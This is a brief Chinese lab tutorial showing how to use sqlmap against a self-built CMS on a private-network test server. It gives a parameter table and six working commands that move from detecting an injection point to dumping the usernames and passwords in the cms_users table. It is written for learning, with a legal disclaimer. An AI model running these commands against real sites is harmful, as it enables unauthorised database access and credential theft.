记一次sqlmap的案例实验
环境搭建
网站搭建–window server 2008 phpstudy
测试机 kali虚拟机
Sql map参数
参数 | 含义 |
---|---|
-u “url” | 检测注入点 |
–dbs | 列出所有数据库的名字 |
–current-db | 列出当前数据库的名字 |
-D | 指定一个数据库 |
–tables | 列出表名 |
-T | 指定表名 |
–columns | 列出所有的字段名 |
-C | 指定字段 |
–dump | 列出字段内容 |
第一步 检测注入点
[sqlmap -u http://192.168.139.136/cms/show.php?id=33
]
第二步 列出所有数据库的名字
[sqlmap -u http://192.168.139.136/cms/show.php?id=33 --dbs
]
第三步 列出当前数据库的名字
[sqlmap -u http://192.168.139.136/cms/show.php?id=33 --current-db
]
第四步 列出表名
[sqlmap -u http://192.168.139.136/cms/show.php?id=33 -D cms --tables
]
第五步列出所有的字段名
[sqlmap -u http://192.168.139.136/cms/show.php?id=33 -D cms --tables -T cms_users --columns
]
第六步 列出字段内容
[sqlmap -u http://192.168.139.136/cms/show.php?id=33 -D cms -T cms_users -C "username,password" --dump
]
免责声明
本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责!